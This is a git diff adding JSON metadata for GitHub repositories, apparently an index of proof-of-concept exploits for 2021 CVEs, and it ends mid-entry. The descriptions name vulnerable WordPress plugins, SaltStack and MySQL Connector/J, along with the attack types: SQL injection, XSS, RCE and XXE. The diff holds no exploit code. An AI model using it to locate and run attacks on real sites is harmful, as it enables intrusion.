"updated_at": "2021-10-06T03:45:29Z", + "pushed_at": "2021-10-06T03:44:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 698068217, + "name": "CVE-2021-24499", + "full_name": "jytmX\/CVE-2021-24499", + "owner": { + "login": "jytmX", + "id": 54280101, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54280101?v=4", + "html_url": "https:\/\/github.com\/jytmX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jytmX\/CVE-2021-24499", + "description": null, + "fork": false, + "created_at": "2023-09-29T04:53:56Z", + "updated_at": "2023-09-29T04:54:46Z", + "pushed_at": "2023-09-29T04:54:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-24507.json b/2021/CVE-2021-24507.json new file mode 100644 index 0000000000..b755f22a81 --- /dev/null +++ b/2021/CVE-2021-24507.json @@ -0,0 +1,33 @@ +[ + { + "id": 486599533, + "name": "CVE-2021-24507", + "full_name": "RandomRobbieBF\/CVE-2021-24507", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2021-24507", + "description": "Astra Pro Addon < 3.5.2 - Unauthenticated SQL Injection - CVE-2021-24507", + "fork": false, + "created_at": "2022-04-28T13:10:55Z", + "updated_at": "2022-04-28T13:11:23Z", + "pushed_at": "2022-04-28T13:11:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-24545.json b/2021/CVE-2021-24545.json new file mode 100644 index 0000000000..12dd0de284 --- /dev/null +++ b/2021/CVE-2021-24545.json @@ -0,0 +1,64 @@ +[ + { + "id": 413699979, + "name": "CVE-2021-24545", + "full_name": "V35HR4J\/CVE-2021-24545", + "owner": { + "login": "V35HR4J", + "id": 54109630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54109630?v=4", + "html_url": "https:\/\/github.com\/V35HR4J", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/V35HR4J\/CVE-2021-24545", + "description": "The plugin does not sanitise the HTML allowed in the Bio of users, allowing them to use malicious JavaScript code, which will be executed when anyone visit a post in the frontend made by such user. As a result, user with a role as low as author could perform Cross-Site Scripting attacks against users, which could potentially lead to privilege escalation when an admin view the related post\/s.", + "fork": false, + "created_at": "2021-10-05T06:28:05Z", + "updated_at": "2021-10-12T14:24:58Z", + "pushed_at": "2021-10-05T06:29:58Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 424104785, + "name": "CVE-2021-24545", + "full_name": "dnr6419\/CVE-2021-24545", + "owner": { + "login": "dnr6419", + "id": 43310843, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43310843?v=4", + "html_url": "https:\/\/github.com\/dnr6419", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dnr6419\/CVE-2021-24545", + "description": "WordPress Plugin HTML Author Bio description XSS", + "fork": false, + "created_at": "2021-11-03T05:41:46Z", + "updated_at": "2021-11-03T05:49:47Z", + "pushed_at": "2021-11-03T05:49:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-2456.json b/2021/CVE-2021-2456.json new file mode 100644 index 0000000000..67c7061501 --- /dev/null +++ b/2021/CVE-2021-2456.json @@ -0,0 +1,33 @@ +[ + { + "id": 407098893, + "name": "CVE-2021-2456", + "full_name": "peterjson31337\/CVE-2021-2456", + "owner": { + "login": "peterjson31337", + "id": 63134447, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63134447?v=4", + "html_url": "https:\/\/github.com\/peterjson31337", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/peterjson31337\/CVE-2021-2456", + "description": "CVE-2021-2456", + "fork": false, + "created_at": "2021-09-16T09:14:09Z", + "updated_at": "2024-08-12T20:16:29Z", + "pushed_at": "2022-05-23T04:45:03Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-24563.json b/2021/CVE-2021-24563.json new file mode 100644 index 0000000000..930ab96a4d --- /dev/null +++ b/2021/CVE-2021-24563.json @@ -0,0 +1,33 @@ +[ + { + "id": 413698388, + "name": "CVE-2021-24563", + "full_name": "V35HR4J\/CVE-2021-24563", + "owner": { + "login": "V35HR4J", + "id": 54109630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54109630?v=4", + "html_url": "https:\/\/github.com\/V35HR4J", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/V35HR4J\/CVE-2021-24563", + "description": "The plugin does not prevent HTML files from being uploaded via its form, allowing unauthenticated user to upload a malicious HTML file containing JavaScript for example, which will be triggered when someone access the file directly", + "fork": false, + "created_at": "2021-10-05T06:21:50Z", + "updated_at": "2022-03-25T03:22:55Z", + "pushed_at": "2021-10-05T06:30:39Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-24647.json b/2021/CVE-2021-24647.json new file mode 100644 index 0000000000..48ec1ad694 --- /dev/null +++ b/2021/CVE-2021-24647.json @@ -0,0 +1,39 @@ +[ + { + "id": 654058343, + "name": "CVE-2021-24647", + "full_name": "RandomRobbieBF\/CVE-2021-24647", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2021-24647", + "description": "CVE-2021-24647 Pie Register < 3.7.1.6 - Unauthenticated Arbitrary Login", + "fork": false, + "created_at": "2023-06-15T09:51:36Z", + "updated_at": "2023-08-14T10:37:29Z", + "pushed_at": "2023-06-15T09:57:51Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-24647", + "exploit", + "pie-register", + "wordpress", + "wordpress-plugin" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-2471.json b/2021/CVE-2021-2471.json new file mode 100644 index 0000000000..d0a24a0483 --- /dev/null +++ b/2021/CVE-2021-2471.json @@ -0,0 +1,95 @@ +[ + { + "id": 420001886, + "name": "jdbc-sqlxml-xxe", + "full_name": "SecCoder-Security-Lab\/jdbc-sqlxml-xxe", + "owner": { + "login": "SecCoder-Security-Lab", + "id": 92973688, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92973688?v=4", + "html_url": "https:\/\/github.com\/SecCoder-Security-Lab", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SecCoder-Security-Lab\/jdbc-sqlxml-xxe", + "description": "h2-jdbc(https:\/\/github.com\/h2database\/h2database\/issues\/3195) & mysql-jdbc(CVE-2021-2471) SQLXML XXE vulnerability reproduction.", + "fork": false, + "created_at": "2021-10-22T07:14:25Z", + "updated_at": "2024-08-12T20:17:27Z", + "pushed_at": "2021-12-12T06:16:02Z", + "stargazers_count": 52, + "watchers_count": 52, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 52, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 420152716, + "name": "CVE-2021-2471", + "full_name": "cckuailong\/CVE-2021-2471", + "owner": { + "login": "cckuailong", + "id": 10824150, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10824150?v=4", + "html_url": "https:\/\/github.com\/cckuailong", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cckuailong\/CVE-2021-2471", + "description": null, + "fork": false, + "created_at": "2021-10-22T15:36:38Z", + "updated_at": "2024-09-26T02:37:57Z", + "pushed_at": "2021-10-23T02:06:40Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 420195489, + "name": "CVE-2021-2471", + "full_name": "DrunkenShells\/CVE-2021-2471", + "owner": { + "login": "DrunkenShells", + "id": 38487751, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38487751?v=4", + "html_url": "https:\/\/github.com\/DrunkenShells", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DrunkenShells\/CVE-2021-2471", + "description": "PoC for CVE-2021-2471 - XXE in MySQL Connector\/J", + "fork": false, + "created_at": "2021-10-22T17:59:16Z", + "updated_at": "2024-08-12T20:17:28Z", + "pushed_at": "2021-10-22T18:21:39Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-24741.json b/2021/CVE-2021-24741.json new file mode 100644 index 0000000000..17e388e222 --- /dev/null +++ b/2021/CVE-2021-24741.json @@ -0,0 +1,35 @@ +[ + { + "id": 400864585, + "name": "CVE-2021-24741", + "full_name": "dldygnl\/CVE-2021-24741", + "owner": { + "login": "dldygnl", + "id": 53053198, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53053198?v=4", + "html_url": "https:\/\/github.com\/dldygnl", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dldygnl\/CVE-2021-24741", + "description": "Multiple SQL Injection Vulnerability in Support Board Version 3.3.3 that allow remote unauthenticated attacker to execute arbitrary SQL commands via status_code, department, user_id, conversation_id, conversation_status_code, and recipient_id parameters to ajax.php which is connected to functions.php which the vulnerability is present.", + "fork": false, + "created_at": "2021-08-28T18:34:40Z", + "updated_at": "2023-04-24T02:39:18Z", + "pushed_at": "2023-04-18T15:20:52Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve" + ], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-24750.json b/2021/CVE-2021-24750.json new file mode 100644 index 0000000000..b8b11b8328 --- /dev/null +++ b/2021/CVE-2021-24750.json @@ -0,0 +1,36 @@ +[ + { + "id": 448110286, + "name": "CVE-2021-24750", + "full_name": "fimtow\/CVE-2021-24750", + "owner": { + "login": "fimtow", + "id": 62258310, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62258310?v=4", + "html_url": "https:\/\/github.com\/fimtow", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fimtow\/CVE-2021-24750", + "description": "Demonstration of the WP Visitor Statistics plugin exploit", + "fork": false, + "created_at": "2022-01-14T21:19:43Z", + "updated_at": "2024-03-04T06:29:35Z", + "pushed_at": "2022-01-18T08:59:41Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploit", + "wordpress" + ], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-24807.json b/2021/CVE-2021-24807.json new file mode 100644 index 0000000000..b7c7997d1a --- /dev/null +++ b/2021/CVE-2021-24807.json @@ -0,0 +1,33 @@ +[ + { + "id": 414551720, + "name": "CVE-2021-24807", + "full_name": "dldygnl\/CVE-2021-24807", + "owner": { + "login": "dldygnl", + "id": 53053198, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53053198?v=4", + "html_url": "https:\/\/github.com\/dldygnl", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dldygnl\/CVE-2021-24807", + "description": "Support Board 3.3.4 Authenticated Stored XSS", + "fork": false, + "created_at": "2021-10-07T10:13:10Z", + "updated_at": "2021-11-14T20:35:20Z", + "pushed_at": "2021-10-07T10:31:30Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-24884.json b/2021/CVE-2021-24884.json new file mode 100644 index 0000000000..ab9319f214 --- /dev/null +++ b/2021/CVE-2021-24884.json @@ -0,0 +1,38 @@ +[ + { + "id": 418585239, + "name": "CVE-2021-24884", + "full_name": "S1lkys\/CVE-2021-24884", + "owner": { + "login": "S1lkys", + "id": 40408435, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40408435?v=4", + "html_url": "https:\/\/github.com\/S1lkys", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/S1lkys\/CVE-2021-24884", + "description": "If an authenticated user who is able to edit Wordpress PHP code in any kind, clicks a malicious link, PHP code can be edited through XSS in Formidable Forms 4.09.04.", + "fork": false, + "created_at": "2021-10-18T16:37:08Z", + "updated_at": "2024-06-21T00:09:35Z", + "pushed_at": "2021-10-19T20:10:08Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploit", + "formidable", + "wordpress", + "xss" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-24917.json b/2021/CVE-2021-24917.json new file mode 100644 index 0000000000..93787a2ada --- /dev/null +++ b/2021/CVE-2021-24917.json @@ -0,0 +1,73 @@ +[ + { + "id": 745792429, + "name": "CVE-2021-24917", + "full_name": "dikalasenjadatang\/CVE-2021-24917", + "owner": { + "login": "dikalasenjadatang", + "id": 78460398, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78460398?v=4", + "html_url": "https:\/\/github.com\/dikalasenjadatang", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dikalasenjadatang\/CVE-2021-24917", + "description": "CVE-2021-24917 ", + "fork": false, + "created_at": "2024-01-20T06:36:13Z", + "updated_at": "2024-08-05T00:43:07Z", + "pushed_at": "2024-01-20T06:37:28Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 803067005, + "name": "CVE-2021-24917", + "full_name": "Cappricio-Securities\/CVE-2021-24917", + "owner": { + "login": "Cappricio-Securities", + "id": 102907425, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4", + "html_url": "https:\/\/github.com\/Cappricio-Securities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2021-24917", + "description": "WordPress WPS Hide Login <1.9.1 - Information Disclosure", + "fork": false, + "created_at": "2024-05-20T02:07:52Z", + "updated_at": "2024-09-06T08:20:35Z", + "pushed_at": "2024-06-24T08:18:55Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-24917", + "cve-2021-24917-exploit", + "cve-2021-24917-poc", + "cve-2021-24917-scanner", + "information-disclosure", + "wapt", + "wps-hide-login", + "wps-hide-login-exploit" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-24959.json b/2021/CVE-2021-24959.json new file mode 100644 index 0000000000..f96e710dd0 --- /dev/null +++ b/2021/CVE-2021-24959.json @@ -0,0 +1,33 @@ +[ + { + "id": 861757230, + "name": "CVE-2021-24959", + "full_name": "RandomRobbieBF\/CVE-2021-24959", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2021-24959", + "description": "WP Email Users <= 1.7.6 - SQL Injection", + "fork": false, + "created_at": "2024-09-23T13:15:34Z", + "updated_at": "2024-10-18T17:57:38Z", + "pushed_at": "2024-09-23T13:19:41Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-25003.json b/2021/CVE-2021-25003.json new file mode 100644 index 0000000000..2ca36f1dd3 --- /dev/null +++ b/2021/CVE-2021-25003.json @@ -0,0 +1,39 @@ +[ + { + "id": 507577066, + "name": "CVE-2021-25003", + "full_name": "biulove0x\/CVE-2021-25003", + "owner": { + "login": "biulove0x", + "id": 105073212, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105073212?v=4", + "html_url": "https:\/\/github.com\/biulove0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/biulove0x\/CVE-2021-25003", + "description": "WPCargo < 6.9.0 - Unauthenticated RCE", + "fork": false, + "created_at": "2022-06-26T13:07:47Z", + "updated_at": "2022-12-02T10:27:12Z", + "pushed_at": "2022-06-27T13:19:50Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-25003", + "python3", + "vulnerabilities", + "wordpress", + "wordpress-plugin" + ], + "visibility": "public", + "forks": 3, + "watchers": 4, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-25032.json b/2021/CVE-2021-25032.json new file mode 100644 index 0000000000..c8963f435a --- /dev/null +++ b/2021/CVE-2021-25032.json @@ -0,0 +1,33 @@ +[ + { + "id": 676499774, + "name": "CVE-2021-25032", + "full_name": "RandomRobbieBF\/CVE-2021-25032", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2021-25032", + "description": "PublishPress Capabilities < 2.3.1 - Unauthenticated Arbitrary Options Update to Blog Compromise", + "fork": false, + "created_at": "2023-08-09T10:41:07Z", + "updated_at": "2024-08-12T20:32:24Z", + "pushed_at": "2023-08-09T10:43:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-25076.json b/2021/CVE-2021-25076.json new file mode 100644 index 0000000000..44381346b2 --- /dev/null +++ b/2021/CVE-2021-25076.json @@ -0,0 +1,38 @@ +[ + { + "id": 499939338, + "name": "CVE-2021-25076", + "full_name": "0xAbbarhSF\/CVE-2021-25076", + "owner": { + "login": "0xAbbarhSF", + "id": 67552744, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67552744?v=4", + "html_url": "https:\/\/github.com\/0xAbbarhSF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xAbbarhSF\/CVE-2021-25076", + "description": "Wordpress Plugin WP User Frontend < 3.5.26 - SQL-Injection (Authenticated)", + "fork": false, + "created_at": "2022-06-04T21:22:10Z", + "updated_at": "2023-09-28T11:39:25Z", + "pushed_at": "2022-06-04T21:24:22Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "2021-2022", + "cve", + "exploit", + "wordpress" + ], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-25094.json b/2021/CVE-2021-25094.json new file mode 100644 index 0000000000..c523153999 --- /dev/null +++ b/2021/CVE-2021-25094.json @@ -0,0 +1,126 @@ +[ + { + "id": 444202507, + "name": "CVE-2021-25094-tatsu-preauth-rce", + "full_name": "darkpills\/CVE-2021-25094-tatsu-preauth-rce", + "owner": { + "login": "darkpills", + "id": 209987, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/209987?v=4", + "html_url": "https:\/\/github.com\/darkpills", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/darkpills\/CVE-2021-25094-tatsu-preauth-rce", + "description": null, + "fork": false, + "created_at": "2022-01-03T21:19:42Z", + "updated_at": "2024-07-09T16:01:40Z", + "pushed_at": "2023-08-30T07:48:36Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 512323706, + "name": "typehub-exploiter", + "full_name": "TUANB4DUT\/typehub-exploiter", + "owner": { + "login": "TUANB4DUT", + "id": 41275808, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41275808?v=4", + "html_url": "https:\/\/github.com\/TUANB4DUT", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TUANB4DUT\/typehub-exploiter", + "description": "GILANG - Exploiter for CVE-2021-25094", + "fork": false, + "created_at": "2022-07-10T02:01:11Z", + "updated_at": "2022-08-24T19:19:13Z", + "pushed_at": "2022-07-10T02:06:55Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 512491203, + "name": "CVE-2021-25094", + "full_name": "xdx57\/CVE-2021-25094", + "owner": { + "login": "xdx57", + "id": 86118516, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86118516?v=4", + "html_url": "https:\/\/github.com\/xdx57", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xdx57\/CVE-2021-25094", + "description": "Tatsu Plugin ZIP File add_custom_font unrestricted upload", + "fork": false, + "created_at": "2022-07-10T17:01:43Z", + "updated_at": "2022-07-10T17:08:06Z", + "pushed_at": "2022-07-10T18:04:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 615683439, + "name": "TypeHub-Exploiter", + "full_name": "experimentalcrow1\/TypeHub-Exploiter", + "owner": { + "login": "experimentalcrow1", + "id": 127784592, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/127784592?v=4", + "html_url": "https:\/\/github.com\/experimentalcrow1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/experimentalcrow1\/TypeHub-Exploiter", + "description": "This script exploits a vulnerability (CVE-2021-25094) in the TypeHub WordPress plugin.", + "fork": false, + "created_at": "2023-03-18T11:26:09Z", + "updated_at": "2023-04-10T00:26:50Z", + "pushed_at": "2023-03-18T11:26:37Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-25162.json b/2021/CVE-2021-25162.json new file mode 100644 index 0000000000..4c2e61590a --- /dev/null +++ b/2021/CVE-2021-25162.json @@ -0,0 +1,33 @@ +[ + { + "id": 411772722, + "name": "CVE-2021-25162", + "full_name": "twentybel0w\/CVE-2021-25162", + "owner": { + "login": "twentybel0w", + "id": 30179317, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30179317?v=4", + "html_url": "https:\/\/github.com\/twentybel0w", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/twentybel0w\/CVE-2021-25162", + "description": "CVE-2021-25162", + "fork": false, + "created_at": "2021-09-29T17:40:17Z", + "updated_at": "2021-09-29T17:41:14Z", + "pushed_at": "2021-09-29T17:41:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-25253.json b/2021/CVE-2021-25253.json new file mode 100644 index 0000000000..e2ffea85c5 --- /dev/null +++ b/2021/CVE-2021-25253.json @@ -0,0 +1,33 @@ +[ + { + "id": 640042584, + "name": "CVE-2021-25253", + "full_name": "msd0pe-1\/CVE-2021-25253", + "owner": { + "login": "msd0pe-1", + "id": 47142249, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47142249?v=4", + "html_url": "https:\/\/github.com\/msd0pe-1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/msd0pe-1\/CVE-2021-25253", + "description": null, + "fork": false, + "created_at": "2023-05-12T20:51:50Z", + "updated_at": "2024-01-18T05:25:25Z", + "pushed_at": "2023-05-12T20:52:09Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-25281.json b/2021/CVE-2021-25281.json new file mode 100644 index 0000000000..b51b85d59d --- /dev/null +++ b/2021/CVE-2021-25281.json @@ -0,0 +1,33 @@ +[ + { + "id": 342564562, + "name": "CVE-2021-25281", + "full_name": "Immersive-Labs-Sec\/CVE-2021-25281", + "owner": { + "login": "Immersive-Labs-Sec", + "id": 79456607, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79456607?v=4", + "html_url": "https:\/\/github.com\/Immersive-Labs-Sec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Immersive-Labs-Sec\/CVE-2021-25281", + "description": "Chaining CVE-2021-25281 and CVE-2021-25282 to exploit a SaltStack", + "fork": false, + "created_at": "2021-02-26T12:08:25Z", + "updated_at": "2023-07-19T01:34:41Z", + "pushed_at": "2021-03-06T12:50:35Z", + "stargazers_count": 26, + "watchers_count": 26, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 26, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-25374.json b/2021/CVE-2021-25374.json new file mode 100644 index 0000000000..f2f091bda8 --- /dev/null +++ b/2021/CVE-2021-25374.json @@ -0,0 +1,33 @@ +[ + { + "id": 356532468, + "name": "CVE-2021-25374_Samsung-Account-Access", + "full_name": "WithSecureLabs\/CVE-2021-25374_Samsung-Account-Access", + "owner": { + "login": "WithSecureLabs", + "id": 99874690, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99874690?v=4", + "html_url": "https:\/\/github.com\/WithSecureLabs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/WithSecureLabs\/CVE-2021-25374_Samsung-Account-Access", + "description": "This script can be used to gain access to a victim's 